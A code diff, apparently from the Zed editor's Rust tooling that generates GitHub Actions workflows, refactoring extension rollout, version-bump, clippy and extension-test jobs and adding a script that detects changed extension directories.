@@ -204,12 +290,12 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
}
fn enable_auto_merge(token: &StepOutput) -> Step<gh_workflow::Run> {
- named::bash(indoc::indoc! {r#"
+ named::bash(indoc! {r#"
if [ -n "$PR_NUMBER" ]; then
- cd extension
gh pr merge "$PR_NUMBER" --auto --squash
fi
"#})
+ .working_directory("extension")
.add_env(("GH_TOKEN", token.to_string()))
.add_env((
"PR_NUMBER",
@@ -228,8 +314,6 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
]),
),
);
- let (get_prev_tag, prev_commit) = get_previous_tag_commit();
- let (calc_changes, removed_files) = get_removed_files(&prev_commit);
let (calculate_short_sha, short_sha) = get_short_sha();
let job = Job::default()
@@ -249,19 +333,17 @@ fn rollout_workflows_to_extension(fetch_repos_job: &NamedJob) -> NamedJob {
})),
)
.add_step(authenticate)
- .add_step(checkout_zed_repo())
.add_step(checkout_extension_repo(&token))
- .add_step(get_prev_tag)
- .add_step(calc_changes)
- .add_step(sync_workflow_files(&removed_files))
+ .add_step(download_workflow_files())
+ .add_step(sync_workflow_files(removed_ci, removed_shared))
.add_step(calculate_short_sha)
- .add_step(create_pull_request(&token, &short_sha))
+ .add_step(create_pull_request(&token, &short_sha, extra_context_input))
.add_step(enable_auto_merge(&token));
named::job(job)
}
-fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob {
+fn create_rollout_tag(rollout_job: &NamedJob, filter_repos_input: &WorkflowInput) -> NamedJob {
fn checkout_zed_repo(token: &StepOutput) -> CheckoutStep {
steps::checkout_repo().with_full_history().with_token(token)
}
@@ -297,6 +379,10 @@ fn create_rollout_tag(rollout_job: &NamedJob) -> NamedJob {
let job = Job::default()
.needs([rollout_job.name.clone()])
+ .cond(Expression::new(format!(
+ "{filter_repos} == ''",
+ filter_repos = filter_repos_input.expr(),
+ )))
.runs_on(runners::LINUX_SMALL)
.timeout_minutes(1u32)
.add_step(authenticate)
@@ -5,17 +5,18 @@ use gh_workflow::{
use indoc::indoc;
use crate::tasks::workflows::{
+ GenerateWorkflowArgs, GitSha,
extensions::WithAppSecrets,
runners,
steps::{CommonJobConditions, NamedJob, named},
vars::{JobOutput, StepOutput, one_workflow_per_non_main_branch_and_token},
};
-pub(crate) fn bump_version() -> Workflow {
+pub(crate) fn bump_version(args: &GenerateWorkflowArgs) -> Workflow {
let (determine_bump_type, bump_type) = determine_bump_type();
let bump_type = bump_type.as_job_output(&determine_bump_type);
- let call_bump_version = call_bump_version(&determine_bump_type, bump_type);
+ let call_bump_version = call_bump_version(args.sha.as_ref(), &determine_bump_type, bump_type);
named::workflow()
.on(Event::default()
@@ -32,6 +33,7 @@ pub(crate) fn bump_version() -> Workflow {
}
pub(crate) fn call_bump_version(
+ target_ref: Option<&GitSha>,
depending_job: &NamedJob,
bump_type: JobOutput,
) -> NamedJob<UsesJob> {
@@ -51,7 +53,7 @@ pub(crate) fn call_bump_version(
"zed-industries",
"zed",
".github/workflows/extension_bump.yml",
- "main",
+ target_ref.map_or("main", AsRef::as_ref),
)
.add_need(depending_job.name.clone())
.with(
@@ -1,12 +1,13 @@
use gh_workflow::{Event, Job, Level, Permissions, PullRequest, Push, UsesJob, Workflow};
use crate::tasks::workflows::{
+ GenerateWorkflowArgs, GitSha,
steps::{NamedJob, named},
vars::one_workflow_per_non_main_branch_and_token,
};
-pub(crate) fn run_tests() -> Workflow {
- let call_extension_tests = call_extension_tests();
+pub(crate) fn run_tests(args: &GenerateWorkflowArgs) -> Workflow {
+ let call_extension_tests = call_extension_tests(args.sha.as_ref());
named::workflow()
.on(Event::default()
.pull_request(PullRequest::default().add_branch("**"))
@@ -15,14 +16,14 @@ pub(crate) fn run_tests() -> Workflow {
.add_job(call_extension_tests.name, call_extension_tests.job)
}
-pub(crate) fn call_extension_tests() -> NamedJob<UsesJob> {
+pub(crate) fn call_extension_tests(target_ref: Option<&GitSha>) -> NamedJob<UsesJob> {
let job = Job::default()
.permissions(Permissions::default().contents(Level::Read))
.uses(
"zed-industries",
"zed",
".github/workflows/extension_tests.yml",
- "main",
+ target_ref.map_or("main", AsRef::as_ref),
);
named::job(job)
@@ -16,9 +16,9 @@ pub(crate) fn release() -> Workflow {
let macos_tests = run_tests::run_platform_tests_no_filter(Platform::Mac);
let linux_tests = run_tests::run_platform_tests_no_filter(Platform::Linux);
let windows_tests = run_tests::run_platform_tests_no_filter(Platform::Windows);
- let macos_clippy = run_tests::clippy(Platform::Mac);
- let linux_clippy = run_tests::clippy(Platform::Linux);
- let windows_clippy = run_tests::clippy(Platform::Windows);
+ let macos_clippy = run_tests::clippy(Platform::Mac, None);
+ let linux_clippy = run_tests::clippy(Platform::Linux, None);
+ let windows_clippy = run_tests::clippy(Platform::Windows, None);
let check_scripts = run_tests::check_scripts();
let create_draft_release = create_draft_release();
@@ -18,7 +18,7 @@ pub fn release_nightly() -> Workflow {
let style = check_style();
// run only on windows as that's our fastest platform right now.
let tests = run_platform_tests_no_filter(Platform::Windows);
- let clippy_job = clippy(Platform::Windows);
+ let clippy_job = clippy(Platform::Windows, None);
let nightly = Some(ReleaseChannel::Nightly);
let bundle = ReleaseBundleJobs {
@@ -1,9 +1,10 @@
use gh_workflow::{
- Concurrency, Container, Event, Expression, Job, Port, PullRequest, Push, Run, Step, Use,
- Workflow,
+ Concurrency, Container, Event, Expression, Input, Job, Level, Permissions, Port, PullRequest,
+ Push, Run, Step, Strategy, Use, UsesJob, Workflow,
};
use indexmap::IndexMap;
use indoc::formatdoc;
+use serde_json::json;
use crate::tasks::workflows::{
steps::{
@@ -14,7 +15,7 @@ use crate::tasks::workflows::{
};
use super::{
- runners::{self, Platform},
+ runners::{self, Arch, Platform},
steps::{self, FluentBuilder, NamedJob, named, release_job},
};
@@ -24,9 +25,10 @@ pub(crate) fn run_tests() -> Workflow {
// - script/update_top_ranking_issues/
// - .github/ISSUE_TEMPLATE/
// - .github/workflows/ (except .github/workflows/ci.yml)
+ // - extensions/ (these have their own test workflow)
let should_run_tests = PathCondition::inverted(
"run_tests",
- r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))",
+ r"^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)",
);
let should_check_docs = PathCondition::new("run_docs", r"^(docs/|crates/.*\.rs)");
let should_check_scripts = PathCondition::new(
@@ -46,9 +48,10 @@ pub(crate) fn run_tests() -> Workflow {
let mut jobs = vec![
orchestrate,
check_style(),
- should_run_tests.guard(clippy(Platform::Windows)),
- should_run_tests.guard(clippy(Platform::Linux)),
- should_run_tests.guard(clippy(Platform::Mac)),
+ should_run_tests.guard(clippy(Platform::Windows, None)),
+ should_run_tests.guard(clippy(Platform::Linux, None)),
+ should_run_tests.guard(clippy(Platform::Mac, None)),
+ should_run_tests.guard(clippy(Platform::Mac, Some(Arch::X86_64))),
should_run_tests.guard(run_platform_tests(Platform::Windows)),
should_run_tests.guard(run_platform_tests(Platform::Linux)),
should_run_tests.guard(run_platform_tests(Platform::Mac)),
@@ -60,7 +63,8 @@ pub(crate) fn run_tests() -> Workflow {
should_check_licences.guard(check_licenses()),
should_check_scripts.guard(check_scripts()),
];
- let tests_pass = tests_pass(&jobs);
+ let ext_tests = extension_tests();
+ let tests_pass = tests_pass(&jobs, &[&ext_tests.name]);
jobs.push(should_run_tests.guard(check_postgres_and_protobuf_migrations())); // could be more specific here?
@@ -91,20 +95,32 @@ pub(crate) fn run_tests() -> Workflow {
}
workflow
})
+ .add_job(ext_tests.name, ext_tests.job)
.add_job(tests_pass.name, tests_pass.job)
}
+/// Controls which features `orchestrate_impl` includes in the generated script.
+#[derive(PartialEq, Eq)]
+enum OrchestrateTarget {
+ /// For the main Zed repo: includes the cargo package filter and extension
+ /// change detection, but no working-directory scoping.
+ ZedRepo,
+ /// For individual extension repos: scopes changed-file detection to the
+ /// working directory, with no package filter or extension detection.
+ Extension,
+}
+
// Generates a bash script that checks changed files against regex patterns
// and sets GitHub output variables accordingly
pub fn orchestrate(rules: &[&PathCondition]) -> NamedJob {
- orchestrate_impl(rules, true)
+ orchestrate_impl(rules, OrchestrateTarget::ZedRepo)
}
-pub fn orchestrate_without_package_filter(rules: &[&PathCondition]) -> NamedJob {
- orchestrate_impl(rules, false)
+pub fn orchestrate_for_extension(rules: &[&PathCondition]) -> NamedJob {
+ orchestrate_impl(rules, OrchestrateTarget::Extension)
}
-fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> NamedJob {
+fn orchestrate_impl(rules: &[&PathCondition], target: OrchestrateTarget) -> NamedJob {
let name = "orchestrate".to_owned();
let step_name = "filter".to_owned();
let mut script = String::new();
@@ -121,6 +137,22 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
fi
CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")"
+ "#});
+
+ if target == OrchestrateTarget::Extension {
+ script.push_str(indoc::indoc! {r#"
+ # When running from a subdirectory, git diff returns repo-root-relative paths.
+ # Filter to only files within the current working directory and strip the prefix.
+ REPO_SUBDIR="$(git rev-parse --show-prefix)"
+ REPO_SUBDIR="${REPO_SUBDIR%/}"
+ if [ -n "$REPO_SUBDIR" ]; then
+ CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)"
+ fi
+
+ "#});
+ }
+
+ script.push_str(indoc::indoc! {r#"
check_pattern() {
local output_name="$1"
local pattern="$2"
@@ -135,7 +167,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
let mut outputs = IndexMap::new();
- if include_package_filter {
+ if target == OrchestrateTarget::ZedRepo {
script.push_str(indoc::indoc! {r#"
# Check for changes that require full rebuild (no filter)
# Direct pushes to main/stable/preview always run full suite
@@ -221,6 +253,16 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
));
}
+ if target == OrchestrateTarget::ZedRepo {
+ script.push_str(DETECT_CHANGED_EXTENSIONS_SCRIPT);
+ script.push_str("echo \"changed_extensions=$EXTENSIONS_JSON\" >> \"$GITHUB_OUTPUT\"\n");
+
+ outputs.insert(
+ "changed_extensions".to_owned(),
+ format!("${{{{ steps.{}.outputs.changed_extensions }}}}", step_name),
+ );
+ }
+
let job = Job::default()
.runs_on(runners::LINUX_SMALL)
.with_repository_owner_guard()
@@ -231,7 +273,7 @@ fn orchestrate_impl(rules: &[&PathCondition], include_package_filter: bool) -> N
NamedJob { name, job }
}
-pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
+pub fn tests_pass(jobs: &[NamedJob], extra_job_names: &[&str]) -> NamedJob {
let mut script = String::from(indoc::indoc! {r#"
set +x
EXIT_CODE=0
@@ -243,20 +285,26 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
"#});
- let env_entries: Vec<_> = jobs
+ let all_names: Vec<&str> = jobs
.iter()
- .map(|job| {
- let env_name = format!("RESULT_{}", job.name.to_uppercase());
- let env_value = format!("${{{{ needs.{}.result }}}}", job.name);
+ .map(|job| job.name.as_str())
+ .chain(extra_job_names.iter().copied())
+ .collect();
+
+ let env_entries: Vec<_> = all_names
+ .iter()
+ .map(|name| {
+ let env_name = format!("RESULT_{}", name.to_uppercase());
+ let env_value = format!("${{{{ needs.{}.result }}}}", name);
(env_name, env_value)
})
.collect();
script.push_str(
- &jobs
+ &all_names
.iter()
.zip(env_entries.iter())
- .map(|(job, (env_name, _))| format!("check_result \"{}\" \"${}\"", job.name, env_name))
+ .map(|(name, (env_name, _))| format!("check_result \"{}\" \"${}\"", name, env_name))
.collect::<Vec<_>>()
.join("\n"),
);
@@ -266,8 +314,9 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
let job = Job::default()
.runs_on(runners::LINUX_SMALL)
.needs(
- jobs.iter()
- .map(|j| j.name.to_string())
+ all_names
+ .iter()
+ .map(|name| name.to_string())
.collect::<Vec<String>>(),
)
.cond(repository_owner_guard_expression(true))
@@ -282,6 +331,19 @@ pub fn tests_pass(jobs: &[NamedJob]) -> NamedJob {
named::job(job)
}
+/// Bash script snippet that detects changed extension directories from `$CHANGED_FILES`.
+/// Assumes `$CHANGED_FILES` is already set. Sets `$EXTENSIONS_JSON` to a JSON array of
+/// changed extension paths. Callers are responsible for writing the result to `$GITHUB_OUTPUT`.
+pub(crate) const DETECT_CHANGED_EXTENSIONS_SCRIPT: &str = indoc::indoc! {r#"
+ # Detect changed extension directories (excluding extensions/workflows)
+ CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true)
+ if [ -n "$CHANGED_EXTENSIONS" ]; then
+ EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))')
+ else
+ EXTENSIONS_JSON="[]"
+ fi
+"#};
+
const TS_QUERY_LS_FILE: &str = "ts_query_ls-x86_64-unknown-linux-gnu.tar.gz";
const CI_TS_QUERY_RELEASE: &str = "tags/v3.15.1";
@@ -298,8 +360,8 @@ pub(crate) fn fetch_ts_query_ls() -> Step<Use> {
pub(crate) fn run_ts_query_ls() -> Step<Run> {
named::bash(formatdoc!(
- r#"tar -xf {TS_QUERY_LS_FILE}
- ./ts_query_ls format --check . || {{
+ r#"tar -xf "$GITHUB_WORKSPACE/{TS_QUERY_LS_FILE}" -C "$GITHUB_WORKSPACE"
+ "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {{
echo "Found unformatted queries, please format them with ts_query_ls."
echo "For easy use, install the Tree-sitter query extension:"
echo "zed://extension/tree-sitter-query"
@@ -428,7 +490,12 @@ fn check_workspace_binaries() -> NamedJob {
))
}
-pub(crate) fn clippy(platform: Platform) -> NamedJob {
+pub(crate) fn clippy(platform: Platform, arch: Option<Arch>) -> NamedJob {
+ let target = arch.map(|arch| match (platform, arch) {
+ (Platform::Mac, Arch::X86_64) => "x86_64-apple-darwin",
+ (Platform::Mac, Arch::AARCH64) => "aarch64-apple-darwin",
+ _ => unimplemented!("cross-arch clippy not supported for {platform}/{arch}"),
+ });
let runner = match platform {
Platform::Windows => runners::WINDOWS_DEFAULT,
Platform::Linux => runners::LINUX_DEFAULT,
@@ -446,16 +513,20 @@ pub(crate) fn clippy(platform: Platform) -> NamedJob {
platform == Platform::Linux,
steps::install_linux_dependencies,
)
+ .when_some(target, |this, target| {
+ this.add_step(steps::install_rustup_target(target))
+ })
.add_step(steps::setup_sccache(platform))
- .add_step(steps::clippy(platform))
+ .add_step(steps::clippy(platform, target))
.add_step(steps::show_sccache_stats(platform));
if platform == Platform::Linux {
job = use_clang(job);
}
- NamedJob {
- name: format!("clippy_{platform}"),
- job,
- }
+ let name = match arch {
+ Some(arch) => format!("clippy_{platform}_{arch}"),
+ None => format!("clippy_{platform}"),
+ };
+ NamedJob { name, job }
}
pub(crate) fn run_platform_tests(platform: Platform) -> NamedJob {
@@ -692,3 +763,26 @@ pub(crate) fn check_scripts() -> NamedJob {
.add_step(check_xtask_workflows()),
)
}
+
+fn extension_tests() -> NamedJob<UsesJob> {
+ let job = Job::default()
+ .needs(vec!["orchestrate".to_owned()])
+ .cond(Expression::new(
+ "needs.orchestrate.outputs.changed_extensions != '[]'",
+ ))
+ .permissions(Permissions::default().contents(Level::Read))
+ .strategy(
+ Strategy::default()
+ .fail_fast(false)
+ // TODO: Remove the limit. We currently need this to workaround the concurrency group issue
+ // where different matrix jobs would be placed in the same concurrency group and thus cancelled.
+ .max_parallel(1u32)
+ .matrix(json!({
+ "extension": "${{ fromJson(needs.orchestrate.outputs.changed_extensions) }}"
+ })),
+ )
+ .uses_local(".github/workflows/extension_tests.yml")
+ .with(Input::default().add("working-directory", "${{ matrix.extension }}"));
+
+ named::job(job)
+}
@@ -10,7 +10,7 @@ pub(crate) fn use_clang(job: Job) -> Job {
const SCCACHE_R2_BUCKET: &str = "sccache-zed";
-const BASH_SHELL: &str = "bash -euxo pipefail {0}";
+pub(crate) const BASH_SHELL: &str = "bash -euxo pipefail {0}";
// https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#jobsjob_idstepsshell
pub const PWSH_SHELL: &str = "pwsh";
@@ -24,13 +24,6 @@ pub(crate) fn cargo_nextest(platform: Platform) -> Nextest {
}
impl Nextest {
- pub(crate) fn with_target(mut self, target: &str) -> Step<Run> {
- if let Some(nextest_command) = self.0.value.run.as_mut() {
- nextest_command.push_str(&format!(r#" --target "{target}""#));
- }
- self.into()
- }
-
#[allow(dead_code)]
pub(crate) fn with_filter_expr(mut self, filter_expr: &str) -> Self {
if let Some(nextest_command) = self.0.value.run.as_mut() {
@@ -131,22 +124,12 @@ impl From<CheckoutStep> for Step<Use> {
FetchDepth::Full => step.add_with(("fetch-depth", 0)),
FetchDepth::Custom(depth) => step.add_with(("fetch-depth", depth)),
})
- .map(|step| match value.token {
- Some(token) => step.add_with(("token", token)),
- None => step,
- })
- .map(|step| match value.path {
- Some(path) => step.add_with(("path", path)),
- None => step,
- })
- .map(|step| match value.repository {
- Some(repository) => step.add_with(("repository", repository)),
- None => step,
- })
- .map(|step| match value.ref_ {
- Some(ref_) => step.add_with(("ref", ref_)),
- None => step,
+ .when_some(value.path, |step, path| step.add_with(("path", path)))
+ .when_some(value.repository, |step, repository| {
+ step.add_with(("repository", repository))
})
+ .when_some(value.ref_, |step, ref_| step.add_with(("ref", ref_)))
+ .when_some(value.token, |step, token| step.add_with(("token", token)))
}
}
@@ -228,13 +211,20 @@ pub fn clear_target_dir_if_large(platform: Platform) -> Step<Run> {
}
}
-pub fn clippy(platform: Platform) -> Step<Run> {
+pub fn clippy(platform: Platform, target: Option<&str>) -> Step<Run> {
match platform {
Platform::Windows => named::pwsh("./script/clippy.ps1"),
- _ => named::bash("./script/clippy"),
+ _ => match target {
+ Some(target) => named::bash(format!("./script/clippy --target {target}")),
+ None => named::bash("./script/clippy"),
+ },
}
}
+pub fn install_rustup_target(target: &str) -> Step<Run> {
+ named::bash(format!("rustup target add {target}"))
+}
+
pub fn cache_rust_dependencies_namespace() -> Step<Use> {
named::uses("namespacelabs", "nscloud-cache-action", "v1")
.add_with(("cache", "rust"))
@@ -279,18 +269,12 @@ pub fn setup_linux() -> Step<Run> {
named::bash("./script/linux")
}
-fn install_mold() -> Step<Run> {
- named::bash("./script/install-mold")
-}
-
fn download_wasi_sdk() -> Step<Run> {
named::bash("./script/download-wasi-sdk")
}
pub(crate) fn install_linux_dependencies(job: Job) -> Job {
- job.add_step(setup_linux())
- .add_step(install_mold())
- .add_step(download_wasi_sdk())
+ job.add_step(setup_linux()).add_step(download_wasi_sdk())
}
pub fn script(name: &str) -> Step<Run> {
@@ -156,14 +156,31 @@ pub(crate) struct StepOutput {
impl StepOutput {
pub fn new<T>(step: &Step<T>, name: &'static str) -> Self {
- Self {
- name,
- step_id: step
- .value
- .id
- .clone()
- .expect("Steps that produce outputs must have an ID"),
- }
+ let step_id = step
+ .value
+ .id
+ .clone()
+ .expect("Steps that produce outputs must have an ID");
+
+ assert!(
+ step.value
+ .run
+ .as_ref()
+ .is_none_or(|run_command| run_command.contains(name)),
+ "Step Output name {name} must occur at least once in run command with ID {step_id}!"
+ );
+
+ Self { name, step_id }
+ }
+
+ pub fn new_unchecked<T>(step: &Step<T>, name: &'static str) -> Self {
+ let step_id = step
+ .value
+ .id
+ .clone()
+ .expect("Steps that produce outputs must have an ID");
+
+ Self { name, step_id }
}
pub fn expr(&self) -> String {
@@ -92,6 +92,8 @@ extend-ignore-re = [
# AMD GPU Services
"ags",
# AMD GPU Services
- "AGS"
+ "AGS",
+ # Yarn Plug'n'Play
+ "PnP"
]
check-filename = true